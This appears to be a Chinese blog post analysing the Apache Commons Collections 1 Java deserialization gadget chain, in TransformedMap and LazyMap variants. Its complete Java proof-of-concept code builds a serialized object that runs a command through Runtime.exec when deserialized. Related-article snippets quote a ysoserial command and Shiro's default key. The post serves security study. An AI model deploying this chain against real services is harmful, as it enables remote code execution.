Java反序列化漏洞——CommonsCollections1链分析

最新推荐文章于 2024-03-01 15:22:24 发布
最新推荐文章于 2024-03-01 15:22:24 发布
阅读量1.1k 收藏 1
点赞数 2
分类专栏: # java漏洞 文章标签: java jvm 开发语言 web安全 反序列化 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/thunderclap_/article/details/129086511
版权

CC1的链在jdk-8u71之后因为AnnotationInvocationHandler的修改已无法利用。

一、TransformedMap

基于jdk-8u65进行试验

1.Rutime.getRuntime().exec()

Runtime.getRuntime().exec("calc");

2.Runtime类不允许序列化,所有需要调用反射进行命令执行,将如上进行反射

Class<?> runtimeclass = Class.forName("java.lang.Runtime");
Constructor<?> declaredConstructor = runtimeclass.getDeclaredConstructor();
declaredConstructor.setAccessible(true);
Object instance = declaredConstructor.newInstance();
Method exec = runtimeclass.getDeclaredMethod("exec", String.class);
exec.invoke(instance,"calc");

3.用InvokeTransformer的transform方法替换

Class<?> runtimeclass = Class.forName("java.lang.Runtime");
Constructor<?> declaredConstructor = runtimeclass.getDeclaredConstructor();
declaredConstructor.setAccessible(true);
Object instance = declaredConstructor.newInstance();

InvokerTransformer exec = new InvokerTransformer("exec", new Class[]{java.lang.String.class}, new Object[]{"calc"});
exec.transform(instance);

4.转换为cc链版本

Object getRuntime = new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class}, new Object[]{"getRuntime",null}).transform(Runtime.class);
Object exec = new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class}, new Object[]{null,null}).transform(getRuntime);
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(exec);

5.用chainedTransformer将如上的Transformer连接起来。

Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class}, new Object[]{"getRuntime",null}),
        new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class}, new Object[]{null,null}),
        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
chainedTransformer.transform(null);

6.接下来看有没有别的类调用transform方法,并且可以参数是Object且可控,举例TransformeMap实例的

Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class}, new Object[]{"getRuntime",null}),
        new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class}, new Object[]{null,null}),
        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map innerMap = new HashMap();
Map outerMap = TransformedMap.decorate(innerMap, null, chainedTransformer);
outerMap.put("test", "xxxx");

利用过程:

  • 1)构造一个Map和一个能够执行代码的ChainedTransformer

  • 2)生成一个TransformedMap实例

  • 3)调用decorate后通过put修改我们的键值对

  • 4)触发我们构造的之前构造的链式Transforme(即ChainedTransformer)进行自动转换

进一步寻找链:

我们知道,如果一个类的方法被重写,那么在调用这个函数时,会优先调用经过修改的方法。因此,如果某个可序列化的类重写了readObject()方法,并且在readObject()中对Map类型的变量进行了键值修改操作,且这个Map变量是可控的,我么就可以实现攻击目标。

  • 这时候发现这个类就是sun.reflect.annotation.AnnotationInvocationHandler(8u71以前可以,8u71以后做了一些修改),如下是AnnotationInvocationHandler的readObject方法,核心逻辑就是Map.Entry<String, Object> memberValue : memberValues.entrySet() 和memberValue.setValue(...)。

  • memberValues就是反序列化后得到的Map,也是经过了TransformedMap修饰的对象,这里遍历了它的所有元素,并依次设置值。在调用setValue设置值的时候就会触发TransformedMap里注册的Transform,进而执行我们为其精心设计的任意代码。

//Java中不是所有对象都支持序列化,待序列化的对象和所有它使用的内部属性对象,必须都实现了java.io.Serializable 接口。而我们最早传给ConstantTransformer的是Runtime.getRuntime() ,Runtime类是没有实现java.io.Serializable 接口的,所以不允许被序列化。
//将Runtime.getRuntime() 换成了Runtime.class ,前者是一个java.lang.Runtime 对象,后者是一个java.lang.Class 对象。Class类有实现Serializable接口,所以可以被序列化。
Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),
        new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),
        new InvokerTransformer("exec", new Class[] { String.class }, new String[] {"calc" }),
};
Transformer transformerChain = new ChainedTransformer(transformers);
Map innerMap = new HashMap();
//有一个if语句对var7进行判断,只有在其不是null的时候才会进入里面执行setValue,否则不会进入也就不会触发漏洞:
innerMap.put("value","xxx");
Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);

//需要创建一个AnnotationInvocationHandler对象,并将前面构造的HashMap设置进来,因为sun.reflect.annotation.AnnotationInvocationHandler 是在JDK内部的类,不能直接使用new来实例化。我使用反射获取到了它的构造方法,并将其设置成外部可见的,再调用就可以实例化了。
//AnnotationInvocationHandler类的构造函数有两个参数,第一个参数是一个Annotation类;第二个是参数就是前面构造的Map。
Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
construct.setAccessible(true);
Object obj = construct.newInstance(Target.class, outerMap);

//通过如下代码将这个对象生成序列化流
ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(barr);
oos.writeObject(obj);
oos.close();

//通过如下代码进行反序列化测试
ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
Object o = objectInputStream.readObject();

二、LazyMap

  • LazyMap的漏洞触发点和TransformedMap唯一的差别是,TransformedMap是在写入元素的时候执行transform,而LazyMap是在其get方法中执行的factory.transform

  • 但是相比于TransformedMap的利用方法,LazyMap后续利用稍微复杂一些,原因是在sun.reflect.annotation.AnnotationInvocationHandler的readObject方法中并没有直接调用到Map的get方法

  • 所以ysoserial找到了另一条路,AnnotationInvocationHandler类的invoke方法有调用到get。

  • 并且恰巧的是AnnotationInvocationHandler这个类实际就是一个InvocationHandler,如果将这个对象用Proxy进行代理,那么在readObject的时候,只要调用任意方法,就会进入到AnnotationInvocationHandler#invoke 方法中,进而触发我们的LazyMap#get

public static void main(String[] args) throws Exception {
    Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),
            new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),
            new InvokerTransformer("exec", new Class[] { String.class }, new String[] {"calc" }),
    };
    Transformer transformerChain = new ChainedTransformer(transformers);
    Map innerMap = new HashMap();
    Map outerMap = LazyMap.decorate(innerMap, transformerChain);
//        直接调用get执行payload
//        outerMap.get("test");
    Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
    construct.setAccessible(true);
    InvocationHandler handler = (InvocationHandler) construct.newInstance(Target.class, outerMap);
    Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[]{Map.class}, handler);
    Object handle = construct.newInstance(Target.class, proxyMap);
    ByteArrayOutputStream barr = new ByteArrayOutputStream();
    ObjectOutputStream oos = new ObjectOutputStream(barr);
    oos.writeObject(handle);
    oos.close();
    System.out.println(barr);
    ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
    objectInputStream.readObject();
}

Thunderclap_
关注
专栏目录
反序列化渗透与攻防(三)之Apache Commons Collections反序列化漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-14 1386
Apache Commons Collections 是一个扩展了Java标准库里集合类Collection结构的第三方基础库,它提供了很多强有力的数据结构类型并且实现了各种集合工具类。作为Apache开源项目的重要组件,Commons Collections被广泛应用于各种Java应用的开发Commons Collections 实现了一个TransformedMap类,该类是对Java标准数据结构Map接口的一个扩展。
Java反序列化和JNDI注入漏洞案例实战
悦分享
08-04 1014
CORBA全称(Common ObjectRequest Broker Architecture)也就是公共对象请求代理体系结构,是OMG(对象管理组织,一个非盈利性的计算机行业标准协会)制定的一种标准的面向对象应用程序体系规范。其提出是为了解决不同应用程序间的通信,曾是分布式计算的主流技术。CORBA标准主要分为三个部分,IDL(接口语言)、ORB(对象请求代理)、IIOP(ORB之间的操作协议)。其结构主要分为三部分:naming service、client side、servant side。...
commons-collections-3.2.2-
11-01
用来修补weblogic的反序列化漏洞,重命名后替换之前Middleware\modules下的的3.2.0版
commons-collections反序列化漏洞分析——远程代码执行
qq_45766062的博客
08-17 874
这里先说说java里面的命令执行。其实java的命令执行和PHP类似,PHP一般通过eval和system来执行系统命令。java则是通过来执行系统命令。
Apache-Commons-Collections漏洞问题
白话机器学习
08-15 1308
Apache-Commons-Collections这个框架,相信每一个Java程序员都不陌生,这是一个非常著名的开源框架。但是,他其实也曾经被爆出过序列化安全漏洞,可以被远程执行命令。
Javacommons-collections反序列化漏洞
午夜安全
04-29 2882
Javacommons-collections反序列化漏洞 开始正文之前,我们的口号是:代码很有趣,安全很重要。 1.漏洞描述 在Java开发中,我们经常会使用到commons-collections这个jar包,当它的版本小于或等于3.2.1时,存在反序列化和远程代码执行的漏洞。 2.漏洞详情 TransformedMap这个类的decorate函数可以将一个普通的Map转换为一个T...
JAVA 反序列化之 Apache Commons Collections 反序列化漏洞分析
最新发布
辛勤搬砖的门卫的专栏
03-01 2024
Apache Commons Collections 反序列化漏洞研究
Shiro反序列化漏洞
m0_71263989的博客
02-20 977
1、简介Apache Shiro框架是一个功能强大且易于使用的 Java 安全框架,它执行身份验证、授权、加密和会话管理。借助 Shiro 易于理解的 API,您可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的 Web 和企业应用程序。2、原理Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>base64编码=>RememberMe Cookie值。
Apahce-Shiro反序列化漏洞复现(CVE-2016-4437)
weixin_45805993的博客
09-28 1675
复现环境:vulhub 漏洞原理 Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行序列化、AES加密、Base64编码操作。 在识别身份的时候,需要对Cookie里的rememberMe字段解密。根据加密的顺序,不难知道解密的顺序为 获取re
反序列化渗透与攻防(五)之shiro反序列化漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-16 919
Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性Apache1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
apache commons-collections 反序列漏洞分析
谭宇
06-19 732
在这里只记录下对jdk1.8可用的apache commons-collections中执行任意类任意执行方法,实际程序代码与原作者相同,想知道更多分析思路,请参考原文 环境 jdk1.8 commons-collections-3.2 完整程序 import org.apache.commons.collections.Transformer; import org.apache.common...
Java反序列化漏洞之Apache Commons Collections
南迪叶先森
06-30 787
Java反序列化漏洞之Apache Commons Collections 公粽号:黒掌 一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主! 前言: 最近静下心来看了很多大牛的笔记,博客,收获甚多,所以在此记录一下入坑Java安全的第一步。 Apache Commons Collections是Apache Commons的组件,该漏洞的问题主要出现在org.apache.commons.collections.Transformer接口上。在Apache commons.collections
Commons-Collections1反序列化
m0_62770485的博客
12-05 698
JAVA安全-Commons-Collections1反序列化
CC1(LazyMap版)
..
10-14 654
前面我们介绍了TransformedMap版的CC1, 但是在ysoserial中用的是LazyMap,其实都差不多,下面开始分析一下,下面重在分析,如何找的就不说了(也不会)。如果文章有错误,欢迎斧正。
Java反序列化(十一)CommonCollectionsK1分析及在Shiro中的利用
Vicl1fe的博客
10-24 1041
前言 在Shiro中的利用可真是复杂 利用CC6攻击Shiro 使用CC6生成payload,进行利用。shiro 1.2.4以下默认使用密钥为kPH+bIxk5D2deZiIxcaaaA==。 通过yso获取序列化对象。 java -jar ysoserial.jar CommonsCollections6 "calc.exe" > result.ser 然后通过Serfile_to_rememberme.py生成payload。 python3 Serfile_to_rememberme.py
Lib之过?Java反序列化漏洞通用利用分析
weixin_34259159的博客
11-14 463
2019独角兽企业重金招聘Python工程师标准>>> ...
Java反序列化漏洞Commons Collections 1 学习笔记
niu_niu_的博客
11-29 621
Java反序列化漏洞,cc1
Apache Commons Collections反序列化漏洞分析与复现
smellycat000的专栏
11-30 3713
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析、漏洞复现。1.2 漏洞分析存在安全缺陷的版本:Apache Commons Collections3.2.1以下,...
Java反序列化漏洞利用:URLClassLoader执行解析
"Java反序列化漏洞利用通过URLClassLoader执行远程代码" Java反序列化漏洞通常出现在处理从网络接收或从持久化存储中恢复的对象时,这些对象未经充分验证就被反序列化。这种漏洞可能导致攻击者能够执行任意代码,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值